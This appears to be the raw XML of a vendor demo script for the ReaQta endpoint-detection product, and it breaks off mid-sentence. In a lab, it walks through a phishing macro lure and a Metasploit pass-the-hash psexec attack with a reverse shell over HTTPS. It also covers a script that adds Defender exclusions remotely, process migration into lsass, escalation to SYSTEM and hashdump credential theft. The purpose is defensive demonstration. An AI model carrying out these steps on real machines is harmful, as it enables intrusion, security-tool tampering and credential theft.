    <w:p w14:paraId="7E94C382" w14:textId="77777777" w:rsidR="00216102" w:rsidRPr="00984A6B" w:rsidRDefault="00216102" w:rsidP="00216102">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984A6B">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Personnel Records (backup).xlsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D3C1A" w14:textId="2419B21D" w:rsidR="00216102" w:rsidRDefault="00216102" w:rsidP="00216102">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984A6B">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S1CustomerList.xlsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D2D855" w14:textId="673239C6" w:rsidR="006373AA" w:rsidRDefault="006373AA" w:rsidP="00216102">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDF3F7E" w14:textId="454EB74F" w:rsidR="006373AA" w:rsidRPr="006373AA" w:rsidRDefault="006373AA" w:rsidP="00216102">
      <w:r w:rsidRPr="006373AA">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Right click on the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006373AA">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReaQta5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.jpg </w:t>
      </w:r>
      <w:r w:rsidRPr="006373AA">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>file and use as desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0AC49" w14:textId="77777777" w:rsidR="00216102" w:rsidRDefault="00216102" w:rsidP="008A019F"/>
    <w:p w14:paraId="360A33F6" w14:textId="78EBA895" w:rsidR="00A03984" w:rsidRDefault="00A03984" w:rsidP="008A019F">
      <w:r>
        <w:t xml:space="preserve">Setup an email account specifically for your demo. Setup Outlook Express to be able to send and receive email from this account from this VM. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2868D" w14:textId="77777777" w:rsidR="00A03984" w:rsidRDefault="00A03984" w:rsidP="008A019F"/>
    <w:p w14:paraId="1741E378" w14:textId="274BD120" w:rsidR="00216102" w:rsidRDefault="00A03984" w:rsidP="008A019F">
      <w:r>
        <w:t xml:space="preserve">Mail the document </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03984">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msf_embedded_exe.docm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03984">
        <w:t>to this account, possibly using the same account,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03984">
        <w:t>with a catchy subject line, e.g. FREE MONEY</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A03984">
        <w:t>!!!!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18666F96" w14:textId="7F8C7CB8" w:rsidR="00A03984" w:rsidRDefault="00A03984" w:rsidP="008A019F"/>
    <w:p w14:paraId="4B99AAF6" w14:textId="23082445" w:rsidR="00A03984" w:rsidRDefault="00A03984" w:rsidP="008A019F"/>
    <w:p w14:paraId="45D5EAC3" w14:textId="77777777" w:rsidR="008A019F" w:rsidRDefault="008A019F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans Light" w:eastAsiaTheme="majorEastAsia" w:hAnsi="IBM Plex Sans Light" w:cstheme="majorBidi"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E1A50B6" w14:textId="4E1F1AA2" w:rsidR="00837A57" w:rsidRPr="004C0ABE" w:rsidRDefault="008A019F" w:rsidP="00216102">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="_Toc101267847"/>
      <w:r w:rsidR="00837A57">
        <w:lastRenderedPageBreak/>
        <w:t>Demo Script</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="73CEFFBC" w14:textId="1B67A1B9" w:rsidR="004C0ABE" w:rsidRDefault="0061577C" w:rsidP="001A6A55">
      <w:r>
        <w:t>ReaQta Hive address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A59AB2" w14:textId="7FB36848" w:rsidR="0061577C" w:rsidRPr="0061577C" w:rsidRDefault="0061577C" w:rsidP="0061577C">
      <w:r w:rsidRPr="0061577C">
        <w:t>https://169.50.130.151/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D9F0F" w14:textId="77777777" w:rsidR="00305387" w:rsidRDefault="00305387" w:rsidP="00305387"/>
    <w:p w14:paraId="20FA09D3" w14:textId="77777777" w:rsidR="00BF1D6B" w:rsidRDefault="00BF1D6B" w:rsidP="00305387">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Do the following before every demo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6735C4DB" w14:textId="27AD7E28" w:rsidR="004C0ABE" w:rsidRDefault="00CE5DB4" w:rsidP="00BF1D6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Remove</w:t>
      </w:r>
      <w:r w:rsidR="00305387" w:rsidRPr="00305387">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the Defender exclusions (in the VM without the ReaQta agent</w:t>
      </w:r>
      <w:r w:rsidR="0035035A">
        <w:t xml:space="preserve"> installed</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CD91A2" w14:textId="5D5975CC" w:rsidR="00BF1D6B" w:rsidRDefault="00BF1D6B" w:rsidP="00BF1D6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Restore the spreadsheets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C08EF6C" w14:textId="3BCF9F82" w:rsidR="00BF1D6B" w:rsidRDefault="00BF1D6B" w:rsidP="00BF1D6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De-isolate the VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658E6D43" w14:textId="65041766" w:rsidR="00CE5DB4" w:rsidRPr="00305387" w:rsidRDefault="00CE5DB4" w:rsidP="00305387">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="097EFE20" w14:textId="35F525D7" w:rsidR="00CE5DB4" w:rsidRDefault="00EF1786" w:rsidP="004C0ABE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc101267848"/>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage </w:t>
      </w:r>
      <w:r w:rsidR="00DD0105">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="004C0ABE">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Boom</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4611DDFF" w14:textId="77777777" w:rsidR="00CE5DB4" w:rsidRDefault="00CE5DB4" w:rsidP="00CE5DB4">
      <w:r>
        <w:t>Use ReaQta to detect and halt ongoing lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFF88C6" w14:textId="77777777" w:rsidR="00CE5DB4" w:rsidRDefault="00CE5DB4" w:rsidP="004C0ABE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2D1777" w14:textId="27BD8EC5" w:rsidR="0035035A" w:rsidRDefault="0035035A" w:rsidP="0035035A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Non-ReaQta Protected VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FAFBE6" w14:textId="72B5A2A2" w:rsidR="00CE5DB4" w:rsidRDefault="00CE5DB4" w:rsidP="00DB4E5A">
      <w:r w:rsidRPr="00CE5DB4">
        <w:t>Set the screen up as below</w:t>
      </w:r>
      <w:r w:rsidR="0035035A">
        <w:t xml:space="preserve"> with the non-ReaQta protected VM on the bottom right.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D62DE5D" w14:textId="77777777" w:rsidR="00CE5DB4" w:rsidRPr="00CE5DB4" w:rsidRDefault="00CE5DB4" w:rsidP="00CE5DB4"/>
    <w:p w14:paraId="7998AE91" w14:textId="4D620231" w:rsidR="004C0ABE" w:rsidRPr="004C0ABE" w:rsidRDefault="00CE5DB4" w:rsidP="00DB4E5A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19A5EC5A" wp14:editId="10833C89">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86250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1706F985" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="716DD72D" w14:textId="7113A302" w:rsidR="004C0ABE" w:rsidRDefault="002F0894" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Open and maximize a terminal then l</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve">aunch Metasploit on </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve">Kali </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">VM </w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t>with this command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE4C5C5" w14:textId="49FE446B" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00672BA8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00672BA8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00270CA5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msf_config</w:t>
      </w:r>
      <w:r w:rsidRPr="00672BA8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.rc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BEF549C" w14:textId="77777777" w:rsidR="0084610A" w:rsidRPr="00672BA8" w:rsidRDefault="0084610A" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02909D7F" w14:textId="1FD51ECF" w:rsidR="00CE5DB4" w:rsidRPr="00CE5DB4" w:rsidRDefault="00CE5DB4" w:rsidP="004C0ABE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5DB4">
        <w:t>Maximise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5DB4">
        <w:t xml:space="preserve"> kali and type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB92252" w14:textId="552EE193" w:rsidR="004C0ABE" w:rsidRPr="009C298F" w:rsidRDefault="009C298F" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C298F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="009C298F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="009C298F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EFE661" w14:textId="77777777" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="286657DE" w14:textId="73E0BC80" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Explain that this is the configuration for a Pass-the-Hash attack using an encrypted password</w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:t xml:space="preserve"> directed at the victim machine (192.168.57.25)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is executed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using the Metasploit psexec module. If the module successfully authenticates, the payload </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is launch</w:t>
      </w:r>
      <w:r w:rsidR="00DE7970">
        <w:t>ed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> back to the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:t xml:space="preserve"> (192.168.57.11)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The attack uses </w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:t xml:space="preserve">https on </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">port 443 so that from a defender's perspective, it just looks like the victim </w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">visiting a secure website, when in fact </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a reverse shell for command and control and exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE846D" w14:textId="77777777" w:rsidR="00CE5DB4" w:rsidRDefault="00CE5DB4" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="1E36BEBE" w14:textId="5B480A9B" w:rsidR="00CE5DB4" w:rsidRDefault="000412C5" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Reset the sc</w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">een layout as above so the audience can see kali and the victim machine at the same time. </w:t>
      </w:r>
      <w:r w:rsidR="00CE5DB4">
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:r w:rsidRPr="000412C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to launch the attack. Note that Defender detects the attack and prevents it from completi</w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:t>ng successfully, which is great and what we would hope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F58E99F" w14:textId="76655E96" w:rsidR="000412C5" w:rsidRDefault="000412C5" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="58903C5E" w14:textId="41BC9EEF" w:rsidR="00803A27" w:rsidRDefault="00803A27" w:rsidP="00803A27">
      <w:r>
        <w:t>Open the exclusions screen within</w:t>
      </w:r>
      <w:r w:rsidR="000055CD">
        <w:t xml:space="preserve"> Defender on the victim machine, after having shown that Defender and its definitions are up-to-date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518FC801" w14:textId="77777777" w:rsidR="00803A27" w:rsidRDefault="00803A27" w:rsidP="000412C5"/>
    <w:p w14:paraId="7283E8EB" w14:textId="644B1C0C" w:rsidR="000412C5" w:rsidRDefault="00DD7F1A" w:rsidP="000412C5">
      <w:r>
        <w:t xml:space="preserve">Pres </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7F1A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ctrl-Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to put Metasploit into the background. Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7F1A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7F1A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>disable_defender.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to show the script. Show how </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>we're</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000412C5">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000412C5">
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000412C5">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:t xml:space="preserve">remotely </w:t>
      </w:r>
      <w:r w:rsidR="000412C5">
        <w:t>log into the victim machine with the same password has</w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00BF1CD0">
        <w:t xml:space="preserve"> as above, starting Powershell and then running the two </w:t>
      </w:r>
      <w:r w:rsidR="0035035A">
        <w:t xml:space="preserve">Defender </w:t>
      </w:r>
      <w:r w:rsidR="00BF1CD0">
        <w:t>exclusion commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3A42CC" w14:textId="77777777" w:rsidR="000412C5" w:rsidRDefault="000412C5" w:rsidP="000412C5"/>
    <w:p w14:paraId="0FF6977B" w14:textId="2D211D74" w:rsidR="000412C5" w:rsidRPr="00BF1CD0" w:rsidRDefault="00BF1CD0" w:rsidP="000412C5">
      <w:r w:rsidRPr="00BF1CD0">
        <w:t>Run the disable Defender script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263900D2" w14:textId="6A8F79AA" w:rsidR="00BF1CD0" w:rsidRDefault="00BF1CD0" w:rsidP="000412C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>disable_defender.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FBB31A" w14:textId="6B76D39A" w:rsidR="00803A27" w:rsidRDefault="00803A27" w:rsidP="000412C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A0BB86" w14:textId="6CD9108B" w:rsidR="00803A27" w:rsidRPr="00803A27" w:rsidRDefault="00803A27" w:rsidP="000412C5">
      <w:r w:rsidRPr="00803A27">
        <w:t xml:space="preserve">Note how </w:t>
      </w:r>
      <w:r w:rsidR="00843E67">
        <w:t xml:space="preserve">the exclusions are now effective and </w:t>
      </w:r>
      <w:r w:rsidRPr="00803A27">
        <w:t xml:space="preserve">have </w:t>
      </w:r>
      <w:r w:rsidR="0035035A">
        <w:t xml:space="preserve">immediately </w:t>
      </w:r>
      <w:r w:rsidRPr="00803A27">
        <w:t>appeared on the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA9F1F" w14:textId="77777777" w:rsidR="000412C5" w:rsidRDefault="000412C5" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="79459C56" w14:textId="1CC8EBFA" w:rsidR="004C0ABE" w:rsidRDefault="00DD7F1A" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD7F1A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>fg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000412C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to return to Metasploit and then press return a couple times to get the prompt back. </w:t>
      </w:r>
      <w:r w:rsidR="000412C5" w:rsidRPr="000412C5">
        <w:t>Now</w:t>
      </w:r>
      <w:r w:rsidR="000412C5">
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve">ype </w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="006D08E1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve"> to launch the attack. Highlight the process migration happening to evade </w:t>
      </w:r>
      <w:r w:rsidR="0084610A">
        <w:t>defenses</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE7970">
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0084610A">
        <w:t>hiding</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve"> within lssass.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FDDD82" w14:textId="77777777" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="0BC137BD" w14:textId="05D4BA63" w:rsidR="00DD7F1A" w:rsidRDefault="0035035A" w:rsidP="00DD7F1A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>On the victim machine, o</w:t>
      </w:r>
      <w:r w:rsidR="00DD7F1A">
        <w:t xml:space="preserve">pen notepad and type </w:t>
      </w:r>
      <w:r w:rsidR="00DD7F1A" w:rsidRPr="00843E67">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00DD7F1A" w:rsidRPr="006D08E1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84070F" w14:textId="77777777" w:rsidR="00DD7F1A" w:rsidRDefault="00DD7F1A" w:rsidP="00DD7F1A"/>
    <w:p w14:paraId="7A0F832B" w14:textId="77777777" w:rsidR="00DD7F1A" w:rsidRDefault="00DD7F1A" w:rsidP="00DD7F1A">
      <w:r>
        <w:t>Back in Metasploit, type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4027F5B8" w14:textId="77777777" w:rsidR="00DD7F1A" w:rsidRPr="00672BA8" w:rsidRDefault="00DD7F1A" w:rsidP="00DD7F1A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00672BA8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>pkill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00672BA8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> notepad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580A594D" w14:textId="7647593D" w:rsidR="00DD7F1A" w:rsidRDefault="0035035A" w:rsidP="00DD7F1A">
      <w:r>
        <w:t xml:space="preserve">Watch as notepad is killed and proves </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>you're</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD313BC" w14:textId="77777777" w:rsidR="00DD7F1A" w:rsidRDefault="00DD7F1A" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2211B5" w14:textId="20B64029" w:rsidR="00803A27" w:rsidRDefault="0035035A" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035035A">
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00803A27">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00803A27" w:rsidRPr="00803A27">
        <w:t xml:space="preserve"> – note how your victim's credentials have bypassed UAC and you're now running as SYTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6963483B" w14:textId="77777777" w:rsidR="00270CA5" w:rsidRDefault="00270CA5" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6887841C" w14:textId="3FD3839B" w:rsidR="004C0ABE" w:rsidRDefault="0035035A" w:rsidP="004C0ABE">
      <w:r w:rsidRPr="0035035A">
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="00672BA8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00803A27">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00803A27" w:rsidRPr="00803A27">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve">ow that it's trivial to collect more password hashes to sell to others on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C0ABE">
        <w:t>darkweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and that in a real Windows domain, using a similar technique could harvest thousands of hashes</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
